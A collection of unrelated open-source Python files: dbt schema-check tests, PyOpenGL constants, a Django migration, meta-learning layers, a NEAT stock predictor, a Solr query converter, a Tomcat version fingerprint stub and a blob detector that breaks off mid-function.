found = parse_signature(func_doc, doc_source,
docformat, parse_errors)
dsp._SIGNATURE_RE = PYTHON_SIGNATURE_RE
if not found:
found = parse_signature(func_doc, doc_source,
docformat, parse_errors)
return found
finally:
dsp._SIGNATURE_RE = PYTHON_SIGNATURE_RE
dsp.parse_function_signature = parse_function_signature
# --------------------------------------------------------------------
from epydoc.cli import cli
cli()
# --------------------------------------------------------------------
|
tests/unit/test_check_source_has_all_columns.py
|
jtalmi/pre-commit-dbt
| 153 |
118726
|
<reponame>jtalmi/pre-commit-dbt
import pytest
from pre_commit_dbt.check_source_has_all_columns import get_catalog_nodes
from pre_commit_dbt.check_source_has_all_columns import main
# Input schema, valid_catalog, expected return value
TESTS = (
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
columns:
- name: col1
- name: col2
""",
True,
0,
),
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
columns:
- name: col1
- name: col2
""",
False,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
columns:
- name: col1
""",
True,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: with_catalog_columns
""",
True,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: without_catalog_columns
""",
True,
0,
),
(
"""
sources:
- name: catalog
tables:
- name: without_catalog_columns
columns:
- name: col1
""",
True,
1,
),
(
"""
sources:
- name: catalog
tables:
- name: without_catalog
columns:
- name: col1
""",
True,
1,
),
)
@pytest.mark.parametrize(
("input_schema", "valid_catalog", "expected_status_code"), TESTS
)
def test_check_source_columns_have_desc(
input_schema, valid_catalog, expected_status_code, catalog_path_str, tmpdir
):
yml_file = tmpdir.join("schema.yml")
input_args = [str(yml_file)]
yml_file.write(input_schema)
if valid_catalog:
input_args.extend(["--catalog", catalog_path_str])
status_code = main(argv=input_args)
assert status_code == expected_status_code
def test_get_catalog_nodes():
input_txt = {
"sources": {
"source.test.catalog_cols": {
"metadata": {},
"columns": {
"COL1": {"type": "TEXT", "index": 1, "name": "COL1"},
"COL2": {"type": "TEXT", "index": 2, "name": "COL1"},
},
}
}
}
result = get_catalog_nodes(input_txt)
assert list(result.keys()) == [frozenset({"test", "catalog_cols"})]
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/shader_image_load_store.py
|
ShujaKhalid/deep-rl
| 210 |
118743
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_shader_image_load_store'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_shader_image_load_store',error_checker=_errors._error_checker)
GL_ALL_BARRIER_BITS=_C('GL_ALL_BARRIER_BITS',0xFFFFFFFF)
GL_ATOMIC_COUNTER_BARRIER_BIT=_C('GL_ATOMIC_COUNTER_BARRIER_BIT',0x00001000)
GL_BUFFER_UPDATE_BARRIER_BIT=_C('GL_BUFFER_UPDATE_BARRIER_BIT',0x00000200)
GL_COMMAND_BARRIER_BIT=_C('GL_COMMAND_BARRIER_BIT',0x00000040)
GL_ELEMENT_ARRAY_BARRIER_BIT=_C('GL_ELEMENT_ARRAY_BARRIER_BIT',0x00000002)
GL_FRAMEBUFFER_BARRIER_BIT=_C('GL_FRAMEBUFFER_BARRIER_BIT',0x00000400)
GL_IMAGE_1D=_C('GL_IMAGE_1D',0x904C)
GL_IMAGE_1D_ARRAY=_C('GL_IMAGE_1D_ARRAY',0x9052)
GL_IMAGE_2D=_C('GL_IMAGE_2D',0x904D)
GL_IMAGE_2D_ARRAY=_C('GL_IMAGE_2D_ARRAY',0x9053)
GL_IMAGE_2D_MULTISAMPLE=_C('GL_IMAGE_2D_MULTISAMPLE',0x9055)
GL_IMAGE_2D_MULTISAMPLE_ARRAY=_C('GL_IMAGE_2D_MULTISAMPLE_ARRAY',0x9056)
GL_IMAGE_2D_RECT=_C('GL_IMAGE_2D_RECT',0x904F)
GL_IMAGE_3D=_C('GL_IMAGE_3D',0x904E)
GL_IMAGE_BINDING_ACCESS=_C('GL_IMAGE_BINDING_ACCESS',0x8F3E)
GL_IMAGE_BINDING_FORMAT=_C('GL_IMAGE_BINDING_FORMAT',0x906E)
GL_IMAGE_BINDING_LAYER=_C('GL_IMAGE_BINDING_LAYER',0x8F3D)
GL_IMAGE_BINDING_LAYERED=_C('GL_IMAGE_BINDING_LAYERED',0x8F3C)
GL_IMAGE_BINDING_LEVEL=_C('GL_IMAGE_BINDING_LEVEL',0x8F3B)
GL_IMAGE_BINDING_NAME=_C('GL_IMAGE_BINDING_NAME',0x8F3A)
GL_IMAGE_BUFFER=_C('GL_IMAGE_BUFFER',0x9051)
GL_IMAGE_CUBE=_C('GL_IMAGE_CUBE',0x9050)
GL_IMAGE_CUBE_MAP_ARRAY=_C('GL_IMAGE_CUBE_MAP_ARRAY',0x9054)
GL_IMAGE_FORMAT_COMPATIBILITY_BY_CLASS=_C('GL_IMAGE_FORMAT_COMPATIBILITY_BY_CLASS',0x90C9)
GL_IMAGE_FORMAT_COMPATIBILITY_BY_SIZE=_C('GL_IMAGE_FORMAT_COMPATIBILITY_BY_SIZE',0x90C8)
GL_IMAGE_FORMAT_COMPATIBILITY_TYPE=_C('GL_IMAGE_FORMAT_COMPATIBILITY_TYPE',0x90C7)
GL_INT_IMAGE_1D=_C('GL_INT_IMAGE_1D',0x9057)
GL_INT_IMAGE_1D_ARRAY=_C('GL_INT_IMAGE_1D_ARRAY',0x905D)
GL_INT_IMAGE_2D=_C('GL_INT_IMAGE_2D',0x9058)
GL_INT_IMAGE_2D_ARRAY=_C('GL_INT_IMAGE_2D_ARRAY',0x905E)
GL_INT_IMAGE_2D_MULTISAMPLE=_C('GL_INT_IMAGE_2D_MULTISAMPLE',0x9060)
GL_INT_IMAGE_2D_MULTISAMPLE_ARRAY=_C('GL_INT_IMAGE_2D_MULTISAMPLE_ARRAY',0x9061)
GL_INT_IMAGE_2D_RECT=_C('GL_INT_IMAGE_2D_RECT',0x905A)
GL_INT_IMAGE_3D=_C('GL_INT_IMAGE_3D',0x9059)
GL_INT_IMAGE_BUFFER=_C('GL_INT_IMAGE_BUFFER',0x905C)
GL_INT_IMAGE_CUBE=_C('GL_INT_IMAGE_CUBE',0x905B)
GL_INT_IMAGE_CUBE_MAP_ARRAY=_C('GL_INT_IMAGE_CUBE_MAP_ARRAY',0x905F)
GL_MAX_COMBINED_IMAGE_UNIFORMS=_C('GL_MAX_COMBINED_IMAGE_UNIFORMS',0x90CF)
GL_MAX_COMBINED_IMAGE_UNITS_AND_FRAGMENT_OUTPUTS=_C('GL_MAX_COMBINED_IMAGE_UNITS_AND_FRAGMENT_OUTPUTS',0x8F39)
GL_MAX_FRAGMENT_IMAGE_UNIFORMS=_C('GL_MAX_FRAGMENT_IMAGE_UNIFORMS',0x90CE)
GL_MAX_GEOMETRY_IMAGE_UNIFORMS=_C('GL_MAX_GEOMETRY_IMAGE_UNIFORMS',0x90CD)
GL_MAX_IMAGE_SAMPLES=_C('GL_MAX_IMAGE_SAMPLES',0x906D)
GL_MAX_IMAGE_UNITS=_C('GL_MAX_IMAGE_UNITS',0x8F38)
GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS=_C('GL_MAX_TESS_CONTROL_IMAGE_UNIFORMS',0x90CB)
GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS=_C('GL_MAX_TESS_EVALUATION_IMAGE_UNIFORMS',0x90CC)
GL_MAX_VERTEX_IMAGE_UNIFORMS=_C('GL_MAX_VERTEX_IMAGE_UNIFORMS',0x90CA)
GL_PIXEL_BUFFER_BARRIER_BIT=_C('GL_PIXEL_BUFFER_BARRIER_BIT',0x00000080)
GL_SHADER_IMAGE_ACCESS_BARRIER_BIT=_C('GL_SHADER_IMAGE_ACCESS_BARRIER_BIT',0x00000020)
GL_TEXTURE_FETCH_BARRIER_BIT=_C('GL_TEXTURE_FETCH_BARRIER_BIT',0x00000008)
GL_TEXTURE_UPDATE_BARRIER_BIT=_C('GL_TEXTURE_UPDATE_BARRIER_BIT',0x00000100)
GL_TRANSFORM_FEEDBACK_BARRIER_BIT=_C('GL_TRANSFORM_FEEDBACK_BARRIER_BIT',0x00000800)
GL_UNIFORM_BARRIER_BIT=_C('GL_UNIFORM_BARRIER_BIT',0x00000004)
GL_UNSIGNED_INT_IMAGE_1D=_C('GL_UNSIGNED_INT_IMAGE_1D',0x9062)
GL_UNSIGNED_INT_IMAGE_1D_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_1D_ARRAY',0x9068)
GL_UNSIGNED_INT_IMAGE_2D=_C('GL_UNSIGNED_INT_IMAGE_2D',0x9063)
GL_UNSIGNED_INT_IMAGE_2D_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_2D_ARRAY',0x9069)
GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE=_C('GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE',0x906B)
GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_2D_MULTISAMPLE_ARRAY',0x906C)
GL_UNSIGNED_INT_IMAGE_2D_RECT=_C('GL_UNSIGNED_INT_IMAGE_2D_RECT',0x9065)
GL_UNSIGNED_INT_IMAGE_3D=_C('GL_UNSIGNED_INT_IMAGE_3D',0x9064)
GL_UNSIGNED_INT_IMAGE_BUFFER=_C('GL_UNSIGNED_INT_IMAGE_BUFFER',0x9067)
GL_UNSIGNED_INT_IMAGE_CUBE=_C('GL_UNSIGNED_INT_IMAGE_CUBE',0x9066)
GL_UNSIGNED_INT_IMAGE_CUBE_MAP_ARRAY=_C('GL_UNSIGNED_INT_IMAGE_CUBE_MAP_ARRAY',0x906A)
GL_VERTEX_ATTRIB_ARRAY_BARRIER_BIT=_C('GL_VERTEX_ATTRIB_ARRAY_BARRIER_BIT',0x00000001)
@_f
@_p.types(None,_cs.GLuint,_cs.GLuint,_cs.GLint,_cs.GLboolean,_cs.GLint,_cs.GLenum,_cs.GLenum)
def glBindImageTexture(unit,texture,level,layered,layer,access,format):pass
@_f
@_p.types(None,_cs.GLbitfield)
def glMemoryBarrier(barriers):pass
|
babybuddy/migrations/0002_add_settings.py
|
Gitoffomalawn/babybuddy
| 922 |
118771
|
<reponame>Gitoffomalawn/babybuddy
# -*- coding: utf-8 -*-
from django.db import migrations
def add_settings(apps, schema_editor):
Settings = apps.get_model("babybuddy", "Settings")
User = apps.get_model("auth", "User")
for user in User.objects.all():
if Settings.objects.filter(user=user).count() == 0:
settings = Settings.objects.create(user=user)
settings.save()
class Migration(migrations.Migration):
initial = True
dependencies = [
("babybuddy", "0001_initial"),
]
operations = [
migrations.RunPython(add_settings, reverse_code=migrations.RunPython.noop),
]
|
ops.py
|
HAHA-DL/MLDG
| 109 |
118777
|
import torch.autograd as autograd
import torch.nn.functional as F
from torch.autograd import Variable
def linear(inputs, weight, bias, meta_step_size=0.001, meta_loss=None, stop_gradient=False):
if meta_loss is not None:
if not stop_gradient:
grad_weight = autograd.grad(meta_loss, weight, create_graph=True)[0]
if bias is not None:
grad_bias = autograd.grad(meta_loss, bias, create_graph=True)[0]
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
else:
grad_weight = Variable(autograd.grad(meta_loss, weight, create_graph=True)[0].data, requires_grad=False)
if bias is not None:
grad_bias = Variable(autograd.grad(meta_loss, bias, create_graph=True)[0].data, requires_grad=False)
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
return F.linear(inputs,
weight - grad_weight * meta_step_size,
bias_adapt)
else:
return F.linear(inputs, weight, bias)
def conv2d(inputs, weight, bias, meta_step_size=0.001, stride=1, padding=0, dilation=1, groups=1, meta_loss=None,
stop_gradient=False):
if meta_loss is not None:
if not stop_gradient:
grad_weight = autograd.grad(meta_loss, weight, create_graph=True)[0]
if bias is not None:
grad_bias = autograd.grad(meta_loss, bias, create_graph=True)[0]
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
else:
grad_weight = Variable(autograd.grad(meta_loss, weight, create_graph=True)[0].data,
requires_grad=False)
if bias is not None:
grad_bias = Variable(autograd.grad(meta_loss, bias, create_graph=True)[0].data, requires_grad=False)
bias_adapt = bias - grad_bias * meta_step_size
else:
bias_adapt = bias
return F.conv2d(inputs,
weight - grad_weight * meta_step_size,
bias_adapt, stride,
padding,
dilation, groups)
else:
return F.conv2d(inputs, weight, bias, stride, padding, dilation, groups)
def relu(inputs):
return F.threshold(inputs, 0, 0, inplace=True)
def maxpool(inputs, kernel_size, stride=None, padding=0):
return F.max_pool2d(inputs, kernel_size, stride, padding=padding)
|
Nasdaq Evolved Network/evolve-feedforward.py
|
ag88/Test-stock-prediction-algorithms
| 385 |
118813
|
# https:github.com/timestocome
# take xor neat-python example and convert it to predict tomorrow's stock
# market change using last 5 days data
# uses Python NEAT library
# https://github.com/CodeReclaimers/neat-python
from __future__ import print_function
import os
import neat
import visualize
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
##############################################################################
# stock data previously input, loaded and log leveled
# using LoadAndMatchDates.py, LevelData.py
# reading output LeveledLogStockData.csv
# pick one, any one and use it as input/output
###############################################################################
# read data in
data = pd.read_csv('LeveledLogStockData.csv')
#print(data.columns)
#print(data)
# select an index to use to train network
index = data['leveled log Nasdaq'].values
n_samples = len(index)
# split into inputs and outputs
n_inputs = 5 # number of days to use as input
n_outputs = 1 # predict next day
x = []
y = []
for i in range(n_samples - n_inputs - 1):
x.append(index[i:i+n_inputs] )
y.append([index[i+1]])
x = np.asarray(x)
y = np.asarray(y)
#print(x.shape, y.shape)
# hold out last samples for testing
n_train = int(n_samples * .9)
n_test = n_samples - n_train
print('train, test', n_train, n_test)
train_x = x[0:n_train]
test_x = x[n_train:-1]
train_y = y[0:n_train]
test_y = y[n_train:-1]
print('data split', train_x.shape, train_y.shape)
print('data split', test_x.shape, test_y.shape)
# shuffle training data?
z = np.arange(0, n_train-1)
np.random.shuffle(z)
tx = train_x[z[::-1]]
ty = train_y[z[::-1]]
train_x = tx
train_y = ty
###############################################################################
# some of these need to be updated in the config-feedforward file
# fitness_threshold = n_train - 1
# num_inputs => n_inputs
# num_hidden => ? how many hidden nodes do you want?
# num_outputs => n_outputs
#
# optional changes
# population size, activation function, .... others as needed
###############################################################################
n_generations = 10
n_evaluate = 1
clip_error = 4.
lr = 0.1
def eval_genomes(genomes, config):
for genome_id, genome in genomes:
genome.fitness = n_train
net = neat.nn.FeedForwardNetwork.create(genome, config)
for xi, xo in zip(train_x, train_y):
output = net.activate(xi)
error = (output[0] - xo[0]) **2
# clipping the error keeps more species in play
#genome.fitness -= lr * error
if error < clip_error:
genome.fitness -= error
else:
genome.fitness -= clip_error
def run(config_file):
# Load configuration.
config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_file)
# Create the population, which is the top-level object for a NEAT run.
p = neat.Population(config)
# Add a stdout reporter to show progress in the terminal.
# True == show all species, False == don't show species
p.add_reporter(neat.StdOutReporter(False))
stats = neat.StatisticsReporter()
p.add_reporter(stats)
p.add_reporter(neat.Checkpointer(5))
# Stop running after n=n_generations
# if n=None runs until solution is found
winner = p.run(eval_genomes, n=n_generations)
# Display the winning genome.
print('\nBest genome:\n{!s}'.format(winner))
# Show output of the most fit genome against testing data.
print('\nTest Output, Actual, Diff:')
winner_net = neat.nn.FeedForwardNetwork.create(winner, config)
predicted = []
for xi, xo in zip(test_x, test_y):
output = winner_net.activate(xi)
predicted.append(output)
node_names = {-1:'4', -2: '3', -3: '2', -4: '1', -5: '0', 0:'Predict Change'}
visualize.draw_net(config, winner, True, node_names=node_names)
visualize.plot_stats(stats, ylog=False, view=True)
visualize.plot_species(stats, view=True)
# ? save?
#p = neat.Checkpointer.restore_checkpoint('neat-checkpoint')
#p.run(eval_genomes, n_evaluate)
# plot predictions vs actual
plt.plot(test_y, 'g', label='Actual')
plt.plot(predicted, 'r-', label='Predicted')
plt.title('Test Data')
plt.legend()
plt.show()
if __name__ == '__main__':
# find and load configuation file
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'config-feedforward')
run(config_path)
|
SearchService2/appscale/search/query_converter.py
|
loftwah/appscale
| 790 |
118814
|
"""
Code for turning a GAE Search query into a SOLR query.
"""
import logging
from appscale.search.constants import InvalidRequest
from appscale.search.models import SolrQueryOptions, SolrSchemaFieldInfo
from appscale.search.query_parser import parser
logger = logging.getLogger(__name__)
def prepare_solr_query(gae_query, fields, grouped_fields):
""" Converts gae_query string into Solr query string.
Args:
gae_query: a str containing GAE Search query.
fields: a list of SolrSchemaFieldInfo.
grouped_fields: a dict containing mapping from GAE field name
to list of SolrSchemaFieldInfo.
Returns:
An instance of SolrQueryOptions.
"""
converter = _QueryConverter(gae_query, fields, grouped_fields)
return converter.solr_query()
_SOLR_TYPE = SolrSchemaFieldInfo.Type
class _QueryConverter(object):
"""
It could be just a set of functions, but having self reference helps
to store temporary values and simplify recursive query rendering.
"""
NOT_MATCHABLE = u'id:""' # A Solr query which matches nothing.
GLOBAL_SEARCH = object() # A constant to mark missing field in expression.
class NotApplicableValue(Exception):
""" Helper exception which is used to follow principle
"Ask forgiveness not permission". It's not always easy
to figure out in advance if it's reasonable to go deeper into
nested syntax tree nodes to prepare query for number or date field
as we don't know what type has a right hand values of expression.
"""
pass
def __init__(self, gae_query, fields, grouped_fields):
""" Initializes instance of _QueryConverter.
Args:
gae_query: A str representing query sent by user.
fields: a list of SolrSchemaFieldInfo.
grouped_fields: a dict containing mapping from GAE field name
to list of SolrSchemaFieldInfo.
"""
self.gae_query = gae_query
self.schema_fields = fields
self.grouped_schema_fields = grouped_fields
self.has_string_values = False
self.has_date_values = False
self.has_number_values = False
self.has_geo_values = False
def solr_query(self):
""" Generates SolrQueryOptions containing solr query string,
query fields and def_type (type of Solr query parser to use).
Returns:
An instance of SolrQueryOptions to use in Solr request.
"""
if not self.gae_query:
return SolrQueryOptions(
query_string='*:*',
query_fields=[],
def_type='edismax'
)
# Build syntax tree
expr_or_exprs_group = parser.parse_query(self.gae_query)
# Render Solr query string according to the syntax tree
try:
solr_query = self._render_exprs(expr_or_exprs_group)
except self.NotApplicableValue:
solr_query = self.NOT_MATCHABLE
# Find all fields which need to be queried for global search
query_fields = []
if self.has_string_values:
query_fields += [
schema_field.solr_name for schema_field in self.schema_fields
if (
schema_field.type == _SOLR_TYPE.ATOM_FIELD
or schema_field.type == _SOLR_TYPE.TEXT_FIELD
)
]
if self.has_date_values:
query_fields += [
schema_field.solr_name for schema_field in self.schema_fields
if schema_field.type == _SOLR_TYPE.DATE_FIELD
]
if self.has_number_values:
query_fields += [
schema_field.solr_name for schema_field in self.schema_fields
if schema_field.type == _SOLR_TYPE.NUMBER_FIELD
]
return SolrQueryOptions(
query_string=solr_query,
query_fields=query_fields,
def_type='edismax'
)
def _render_exprs(self, expr_or_exprs_group):
""" Renders an Expression or ExpressionsGroup.
Args:
expr_or_exprs_group: an Expression or ExpressionsGroup to render.
Return:
a str representing Solr query corresponding to expr_or_exprs_group.
"""
if isinstance(expr_or_exprs_group, parser.Expression):
expr = expr_or_exprs_group
return self._render_single_expr(expr)
exprs_group = expr_or_exprs_group
rendered_elements = []
for element in exprs_group.elements:
try:
rendered = self._render_exprs(element)
rendered_elements.append(rendered)
except self.NotApplicableValue:
# Element can't be matched: field is missing or value is not applicable
if exprs_group.operator == parser.AND:
# Expressions group doesn't match as one AND elements doesn't match.
raise
continue
if not rendered_elements:
raise self.NotApplicableValue()
if len(rendered_elements) == 1:
return rendered_elements[0]
operator = u' AND ' if exprs_group.operator == parser.AND else u' OR '
return u'({})'.format(operator.join(rendered_elements))
def _render_single_expr(self, expr):
""" Renders a single Expression which corresponds to either
field-specific or global search expression.
A single expression can be extracted to group of expressions
connected by OR, where each nested expression corresponds to
one of field types. It's done because GAE allows to define fields
with different type but the same name, so one GAE field name
maps to number of different Solr fields.
Args:
expr: an Expression.
Return:
a str representing Solr query corresponding to expr_or_exprs_group.
"""
# Corresponds to converting field-search expression or unary expression:
# `hello`
# `~hello`
# `NOT hello`
# `fieldX:2018-3-15`
# `fieldY:(some OR (more AND complex) ~expression NOT here)`
if not expr.field_name:
return self._render_unary_exprs(
self.GLOBAL_SEARCH, parser.EQUALS, expr.value
)
try:
# Expr should match any of available field types for GAE field name.
schema_fields = self.grouped_schema_fields[expr.field_name]
except KeyError:
logger.warning('Unknown field "{}" in query string'
.format(expr.field_name))
raise self.NotApplicableValue()
return self._render_unary_exprs(schema_fields, expr.operator, expr.value)
def _render_unary_exprs(self, schema_fields, operator, value_or_values_group):
""" Renders an Expression limited to particular SOLR field
(so it has one known type) or GLOBAL_SEARCH.
If value_or_values_group is ValuesGroup, it extracts values in brackets
and prepends solr field with operator to every nested value.
Args:
schema_fields: a list of SolrSchemaFieldInfo or GLOBAL_SEARCH.
operator: EQUALS, LESS, LESS_EQ, GREATER or GREATER_EQ.
value_or_values_group: a Value or ValuesGroup.
Return:
a str representing Solr query corresponding to expression
limited to particular SOLR field (with known type) or GLOBAL_SEARCH.
"""
if isinstance(value_or_values_group, parser.Value):
value = value_or_values_group
return self._render_single_unary_expr(schema_fields, operator, value)
# Process nested tree.
values_group = value_or_values_group
nested_unary_exprs = []
for element in values_group.elements:
try:
rendered = self._render_unary_exprs(schema_fields, operator, element)
nested_unary_exprs.append(rendered)
except self.NotApplicableValue:
# e.g.: searching "word" against filed with date type.
if operator == parser.AND:
# There's no sense to continue.
raise
continue
if not nested_unary_exprs:
# e.g.: searching ONLY text against filed with date type.
raise self.NotApplicableValue()
if len(nested_unary_exprs) == 1:
return nested_unary_exprs[0]
operator = u' AND ' if values_group.operator == parser.AND else u' OR '
return u'({})'.format(operator.join(nested_unary_exprs))
def _render_single_unary_expr(self, schema_fields, operator, value):
""" Renders a leaf of Solr query string which is limited
to particular SOLR field (or GLOBAL_SEARCH) and a single value.
Args:
schema_fields: a list of SolrSchemaFieldInfo or GLOBAL_SEARCH.
operator: EQUALS, LESS, LESS_EQ, GREATER or GREATER_EQ.
value: a Value.
Return:
a str representing Solr query leaf corresponding to expression
limited to particular SOLR field (or GLOBAL_SEARCH) and a single value.
"""
right_hand = value.str_value
if right_hand[0] != u'"':
right_hand = u'"{}"'.format(right_hand)
if value.stem:
right_hand = right_hand + u'~'
if schema_fields == self.GLOBAL_SEARCH:
# We need to add all text, atom and html fields to query_fields list
self.has_string_values = True
if value.has_number_value:
# We need to add all number fields to query_fields list
self.has_number_values = True
if value.has_date_value:
# We need to add all date fields to query_fields list
self.has_date_values = True
return u'NOT {}'.format(right_hand) if value.not_ else right_hand
# Connect by OR rendered statement for each field type
statements = []
for schema_field in schema_fields:
# Skip if value is not applicable for field type.
if schema_field.type == _SOLR_TYPE.TEXT_FIELD:
if operator != parser.EQUALS:
# Can't compare using > < >= <=
continue
elif schema_field.type == _SOLR_TYPE.ATOM_FIELD:
if operator != parser.EQUALS or value.stem:
# Can't stem atom field or compare using > < >= <=
continue
elif schema_field.type == _SOLR_TYPE.NUMBER_FIELD:
if not value.has_number_value or value.stem:
# Can't search text against number field
continue
elif schema_field.type == _SOLR_TYPE.DATE_FIELD:
if not value.has_date_value or value.stem:
# Can't search text against date field
continue
elif schema_field.type == _SOLR_TYPE.GEO_FIELD:
logger.warning('Geo location queries are not supported yet.')
continue
else: # schema_field.type is not queryable
continue
rendered = self._render_field_operator_value(
schema_field, operator, right_hand
)
statements.append(u'NOT {}'.format(rendered) if value.not_ else rendered)
if not statements:
# e.g.: searching "word" against filed with ONLY date type.
raise self.NotApplicableValue()
if len(statements) == 1:
return statements[0]
# e.g.: searching "1999-10-20" against field with type date and text.
# Any match should be enough.
return u'({})'.format(u' OR '.join(statements))
@staticmethod
def _render_field_operator_value(schema_field, operator, right_hand):
""" Renders equality or range query according to Solr query syntax.
Args:
schema_field: a SolrSchemaFieldInfo or GLOBAL_SEARCH.
operator: EQUALS, LESS, LESS_EQ, GREATER or GREATER_EQ.
right_hand: a str representing value.
Returns:
A string representing equality or range query.
"""
if operator == parser.EQUALS:
return u'{}:{}'.format(schema_field.solr_name, right_hand)
if operator == parser.LESS:
return u'{}:[* TO {}}}'.format(schema_field.solr_name, right_hand)
if operator == parser.LESS_EQ:
return u'{}:[* TO {}]'.format(schema_field.solr_name, right_hand)
if operator == parser.GREATER:
return u'{}:{{{} TO *]'.format(schema_field.solr_name, right_hand)
if operator == parser.GREATER_EQ:
return u'{}:[{} TO *]'.format(schema_field.solr_name, right_hand)
|
src/platform/tomcat/fingerprints/Tomcat33.py
|
0x27/clusterd
| 539 |
118834
|
from src.platform.tomcat.interfaces import AppInterface
class FPrint(AppInterface):
def __init__(self):
super(FPrint, self).__init__()
self.version = "3.3"
self.uri = "/doc/readme"
|
rltime/acting/actor_wrapper.py
|
frederikschubert/rltime
| 147 |
118861
|
from .acting_interface import ActingInterface
class ActorWrapper(ActingInterface):
"""Wrapper for a created actor
Allows overriding only specific actor methods while passing through the
rest, similar to gym wrappers
"""
def __init__(self, actor):
super().__init__(*actor.get_spaces())
self._actor = actor
def get_samples(self, min_samples):
return self._actor.get_samples(min_samples)
def get_env_count(self):
return self._actor.get_env_count()
def set_actor_policy(self, actor_policy):
return self._actor.set_actor_policy(actor_policy)
def update_state(self, progress, policy_state=None):
return self._actor.update_state(progress, policy_state)
def close(self):
return self._actor.close()
|
py/vision/blob_detector.py
|
wx-b/dm_robotics
| 128 |
118863
|
# Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module defining a color-based blob detector for camera images."""
from typing import Mapping, Optional, Tuple
from absl import logging
import cv2
from dmr_vision import detector
from dmr_vision import types
import numpy as np
class BlobDetector(detector.ImageDetector):
"""Color-based blob detector."""
def __init__(self,
color_ranges: Mapping[str, types.ColorRange],
scale: float = (1. / 6.),
min_area: int = 230,
mask_points: Optional[types.MaskPoints] = None,
visualize: bool = False,
toolkit: bool = False):
"""Constructs a `BlobDetector` instance.
Args:
color_ranges: A mapping between a given blob name and the range of YUV
color used to segment it from an image.
scale: Rescaling image factor. Used for increasing the frame rate, at the
cost of reducing the precision of the blob barycenter and controur.
min_area: The minimum area the detected blob must have.
mask_points: (u, v) coordinates defining a closed regions of interest in
the image where the blob detector will not look for blobs.
visualize: Whether to output a visualization of the detected blob or not.
toolkit: Whether to display a YUV GUI toolkit for parameter tuning.
Enabling this implcitly sets `visualize = True`.
"""
self._color_ranges = color_ranges
self._scale = np.array(scale)
self._min_area = min_area
self._mask_points = mask_points if mask_points is not None else ()
self._visualize = visualize
self._mask = None
self._toolkit = toolkit
if self._toolkit:
self._visualize = True
self._window_name = "UV toolkit"
self._window_size = (800, 1000)
cv2.namedWindow(
self._window_name,
cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO | cv2.WINDOW_GUI_EXPANDED)
cv2.resizeWindow(self._window_name, self._window_size)
self._trackbar_scale = 1000
num_colors = len(self._color_ranges.keys())
if num_colors > 1:
cv2.createTrackbar("Color selector", self._window_name, 0,
len(self._color_ranges.keys()) - 1,
self._callback_change_color)
cv2.createTrackbar("Subsampling", self._window_name, 5, 10,
lambda x: None)
cv2.setTrackbarMin("Subsampling", self._window_name, 1)
self._u_range_trackbar = CreateRangeTrackbar(self._window_name, "U min",
"U max", self._color_ranges,
"U", self._trackbar_scale)
self._v_range_trackbar = CreateRangeTrackbar(self._window_name, "V min",
"V max", self._color_ranges,
"V", self._trackbar_scale)
self._callback_change_color(0)
def __del__(self):
if self._toolkit:
cv2.destroyAllWindows()
def __call__(self,
image: np.ndarray) -> Tuple[types.Centers, types.Detections]:
"""Finds color blobs in the image.
Args:
image: the input image.
Returns:
A dictionary mapping a blob name with
- the (u, v) coordinate of its barycenter, if found;
- `None`, otherwise;
and a dictionary mapping a blob name with
- its contour superimposed on the input image;
- `None`, if `BlobDetector` is run with `visualize == False`.
"""
# Preprocess the image.
image = self._preprocess(image)
# Convert the image to YUV.
yuv_image = cv2.cvtColor(image.astype(np.float32) / 255., cv2.COLOR_RGB2YUV)
# Find blobs.
blob_centers = {}
blob_visualizations = {}
for name, color_range in self._color_ranges.items():
blob = self._find_blob(yuv_image, color_range)
blob_centers[name] = blob.center * (1. / self._scale) if blob else None
blob_visualizations[name] = (
self._draw_blobs(image, blob) if self._visualize else None)
if self._toolkit:
self._update_gui_toolkit(yuv_image, image)
return blob_centers, blob_visualizations
def _preprocess(self, image: np.ndarray) -> np.ndarray:
"""Preprocesses an image for color-based blob detection."""
# Resize the image to make all other operations faster.
size = np.round(image.shape[:2] * self._scale).astype(np.int32)
resized = cv2.resize(image, (size[1], size[0]))
if self._mask is None:
self._setup_mask(resized)
# Denoise the image.
denoised = cv2.fastNlMeansDenoisingColored(
src=resized, h=7, hColor=7, templateWindowSize=3, searchWindowSize=5)
return cv2.multiply(denoised, self._mask)
def _setup_mask(self, image: np.ndarray) -> None:
"""Initialises an image mask to explude pixels from blob detection."""
self._mask = np.ones(image.shape, image.dtype)
for mask_points in self._mask_points:
cv2.fillPoly(self._mask, np.int32([mask_points * self._scale]), 0)
def _find_blob(self, yuv_image: np.ndarray,
